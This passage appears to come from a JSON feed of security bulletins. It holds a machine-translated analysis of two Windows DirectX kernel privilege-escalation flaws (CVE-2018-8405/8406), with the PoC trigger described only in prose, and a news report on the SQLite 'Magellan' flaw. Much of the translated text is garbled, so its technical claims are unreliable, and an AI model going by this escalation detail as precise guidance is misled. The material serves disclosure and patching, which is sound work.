describes in detail the WDDM kernel end of the complex attack surface. \nExploit \nHere, you can find the vulnerabilities related to the proof-of-concept\uff08PoC\uff09source code. If you want to reproduce the vulnerability, the need in 2018 to 8 months before the Windows version. The kernel debug program is added to the test used on the computer, and in the presence of a vulnerability in a driver provided on a special pool. In the actual test, I'm on Windows 10 x64 on the successful reproduction of these vulnerabilities. \nD3DKMTCreateAllocation type confusion vulnerability ZDI-18-946/CVE-2018-8405\uff09 \nIn dgxkrnl. sys in DXGDEVICE::CreateAllocation found the first vulnerability is through the D3DKMTCreateAllocation method exposed, and could allow a local attacker privilege escalation to the SYSTEM level. For this vulnerability, we recommend the following: https://www.zerodayinitiative.com/advisories/ZDI-18-946/Microsoft's official patch please refer to: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8405 the. The vulnerability stems from the lack of the user to provide data sufficient to verify, may lead to type confusion problems. \nTo the specific view of this situation, the need to run a PoC before, in dxgkrn. sys on the Enable special pool. Type confusion is due to the allocation process does not properly use the CrossAdapter flag. In the PoC code, the use of CrossAdapter flag 0 to be allocated, then the result will be a handle to pass a second allocation, in the allocation, it will CrossAdapter the flag is set to 1. \n! [](/Article/UploadPic/2018-12/2018121617624432. png) \nBelow is the blue screen analysis: \n! [](/Article/UploadPic/2018-12/2018121617624857. png) \n! [](/Article/UploadPic/2018-12/2018121617624942. png) \n! [](/Article/UploadPic/2018-12/2018121617625183. png) \nWhere the problem code is located in the DXGDEVICE::CreateAllocation, and in the dispensing end occurs when the typical type of confusion: \n! [](/Article/UploadPic/2018-12/2018121617625860. png) \nD3DKMTRender type confusion vulnerability ZDI-18-947/CVE-2018-8406\uff09 \nIn dxgmms2. sys, there is also another vulnerability, and by D3DKMTRender exposed. The vulnerability also could allow a local attacker privilege escalation to the SYSTEM. For this vulnerability, we recommend the following: https://www.zerodayinitiative.com/advisories/ZDI-18-947/ Microsoft's official patch please refer to: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8406 the. With the first vulnerability, the vulnerability will lead to the type confusion issue. Although it looks similar, but these vulnerabilities have different root causes. \n\n\n**[1] [[2]](<92402_2.htm>) [next](<92402_2.htm>)**\n", "edition": 1, "reporter": "\u4f5a\u540d", "published": "2018-12-16T00:00:00", "title": "For more DirectX kernel vulnerability analysis-vulnerability warning-the black bar safety net", "type": "myhack58", "enchantments": {}, "bulletinFamily": "info", "cvelist": ["CVE-2018-8406", "CVE-2018-8405"], "modified": "2018-12-16T00:00:00", "id": "MYHACK58:62201892402", "href": "http://www.myhack58.com/Article/html/3/62/2018/92402.htm", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2018-12-15T07:47:59", "_object_types": ["robots.models.thn.ThnBulletin", "robots.models.base.Bulletin"], "references": [], "description": "[](<https://1.bp.blogspot.com/-Jr0NWu0YmLU/XBSX6dV6q_I/AAAAAAAADSs/H3CZmY27xW4R1M7WpxBgcBw1UR7A-tzMQCLcBGAs/s728-e100/MOSHED-2018-12-15-11-19-37-min.jpg>)\n\nCybersecurity researchers have discovered a critical vulnerability in widely used SQLite database software that exposes billions of deployments to hackers. \n \nDubbed as '**Magellan**' by Tencent's Blade security team, the newly discovered SQLite flaw could allow remote attackers to execute arbitrary or malicious code on affected devices, leak program memory or crash applications. \n \nSQLite is a lightweight, widely used disk-based relational database management system that requires minimal support from operating systems or external libraries, and hence compatible with almost every device, platform, and programming language. \n\n\n \nSQLite is the most widely deployed database engine in the world today, which is being used by millions of applications with literally billions of deployments, including IoT devices, macOS and Windows apps, including major web browsers, such as Adobe software, Skype and more. \n \nSince Chromium-based web browsers\u2014including Google Chrome, Opera, Vivaldi, and Brave\u2014also support SQLite through the [deprecated](<https://developers.google.com/web/tools/lighthouse/audits/web-sql>) Web SQL database API, a remote attacker can easily target users of affected browsers just by convincing them into visiting a specially crafted web-page. \n \n\n\n> \"After testing Chromium was also affected by this vulnerability, Google has confirmed and fixed this vulnerability,\" the researchers said in a [blog post](<https://blade.tencent.com/magellan/index_en.html>).\n\n \nSQLite has released updated [version 3.26.0](<https://www.sqlite.org/releaselog/3_26_0.html>) of its software to address the issue after receiving responsible disclosure from the researchers. \n \nGoogle has also released Chromium version [71.0.3578.80](<https://chromereleases.googleblog.com/2018/12/stable-channel-update-for-desktop.html>) to patch the issue and pushed the patched version to the latest version of Google Chrome and Brave web-browsers. \n\n\n \nTencent researchers said they successfully build a proof-of-concept exploit using the Magellan vulnerability and successfully tested their exploit against Google Home. \n \nSince most applications can't be patched anytime sooner, researchers have decided not to disclose technical details and proof-of-concept exploit code to the public. \n \n\n\n> \"We will not disclose any details of the vulnerability at this time, and we are pushing other vendors to fix this vulnerability as soon as possible,\" the researchers said.\n\n \nSince SQLite is used by everybody including Adobe, Apple, Dropbox, Firefox, Android, Chrome, Microsoft and a bunch of other software, the Magellan vulnerability is a noteworthy issue, even if it's not yet been exploited in the wild. \n \nUsers and administrators are highly recommended to update their systems and affected software versions to the latest release as soon as they become available. \n \nStay tuned for more information.\n", "reporter": "The Hacker News", "published": "2018-12-15T06:05:00", "type": "thn", "title": "Critical SQLite Flaw Leaves Millions of Apps Vulnerable to Hackers", "enchantments": {}, "bulletinFamily": "info", "cvelist": [], "_object_type": "robots.models.thn.ThnBulletin", "modified": "2018-12-15T06:05:10", "id": "THN:7ADF1FEAC790C2350486AC5C339CA52B", "href": "https://thehackernews.com/2018/12/sqlite-vulnerability.html", "cvss": {"score": 0.0, "vector": "NONE"}}]}
